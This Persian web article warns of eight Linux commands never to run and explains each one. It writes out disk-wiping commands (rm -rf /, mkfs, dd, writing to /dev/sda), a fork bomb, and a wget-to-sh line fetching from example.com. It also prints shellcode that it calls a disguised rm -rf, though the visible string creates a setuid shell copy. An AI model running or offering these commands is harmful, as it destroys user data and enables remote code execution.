هشت فرمانی که در سیستم عامل لینوکس نباید اجرا شود

   
نام نویسنده:
 جمعه 25 اردیبهشت 94 ساعت: 13:28:12


1_ rm –fr /
همه چیز از جمله فایل های روی دیسک سخت و فایل های روی دستگاه های رسانه های جداشدنی وصل شده به سیستم را پاک می کند.
rm: فایل های ذیل را پاک کن.
-rf: فرمان rm را به صورت بازگشتی اجرا کن و تمام فایل ها را بدون پرسش یا اطلاع کاربر پاک کن.
/: به فرمان rm اطلاع می دهد که از دایرکتوری (فولدر) پدر (ریشه) که شامل تمام فایل های روی کامپیوتر کاربر و تمام دستگاه های رسانه ای مجازی سازی شده از جمله () و درایو های جداشدنی است، شروع به اجرا کند.
2_Disguised rm –rf /
در واقع نسخه ی شانزده شانزده ای (مبنای شانزده) rm –fr / است و تمام فایل ها ی کاربر را نابود می کند، مثل اینکه فرمان rm –fr / اجرا شده باشد.


char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";


3_ :(){ :|: & };
این فرمان بش (پوسته) در واقع نوعی از حمله ی محروم سازی از سرویس است. این دستور تابعی از شل (پوسته) تعریف می کند که کپی های جدیدی، که مستمراً خودشان را تکرار می کنند،  از خودش می سازد، به این ترتیب سریعاً کل زمان CPU و حافظه مصرف می شود و سبب فریز شدن (هنگ کردن) کامپیوتر می شود.
4_ mkfs.ext4 /dev/sda1
معادل با اجرای format c: روی ویندوز است.
mkfs.ext4: یک فایل سیستم جدید از نوع ای ایکس تی 4 (fourth extended filesystem) روی دستگاه جاری می سازد.
/dev/sda1 : اولین قسمت (پارتیشن) روی اولین دیسک سخت که در حال استفاده است را مشخص می کند.
5_ command > /dev/sda
داده را مستقیماً روی دیسک سخت می نویسد و سیستم فایل را تخریب می کند.
Command: فرمانی را اجرا کن ( هر فرمانی می تواند منظور شود).
<: خروجی فرمان را در آدرس پیشرو ثبت کن.
/dev/sda: خروجی فرمان جاری را مستقیماً روی دیسک سخت بنویس.
6_ dd if=/dev/random of=/dev/sda
dd: کپی سطح پایین، از محلی به محل دیگر، انجام بده.
if=/dev/random: از dev/random(داده ی تصادفی) به عنوان ورودی استفاده کن. (در مورد این فرمان ممکن است آدرس های مثل /dev/zero (zeros)هم دیده شود)
of=/dev/sda: به عنوان خروجی، روی اولین دیسک سخت، سیستم فایل آن را با داده ی زباله جایگزین کن.
7_ mv ~ /dev/null
هوم دایرکتوری کاربر را به سیاه چاله تغییر می دهد.
mv: فایل یا فولدر پیشرو را به آدرسی دیگر انتقال بده.
~: نمایانگر کل فولدر هوم کاربر است.
/dev/null: فولدر هوم را به /dev/nullانتقال بده، تمام فایل های کاربر را نابود کن، تمام کپی های اصلی را پاک کن.


8_ wget http://example.com/something -O – | sh


پردازه (اسکریپت) ای را دانلود و اجرا کن.
wget:فایلی را دانلود کن (همچنین به جای wget ممکن است ازcurl استفاده شود)
:http://example.com/somethingفایلرا ازین آدرس دانلود کن.
|:خروجی فرمان (فایل دانلود شده ) را مستقیماً به فرمانی دیگر بفرست.
sh: فایل را به فرمانsh ، فرمانی که اگر فایل از نوع پردازه ی بش (پوسته) باشد آن را اجرا می کند، بفرست.

اخبار مرتبط

دیگر اخبار نویسنده

ارسال نظر


شخصی سازی Close
شما در این صفحه قادر به شخصی سازی نمیباشید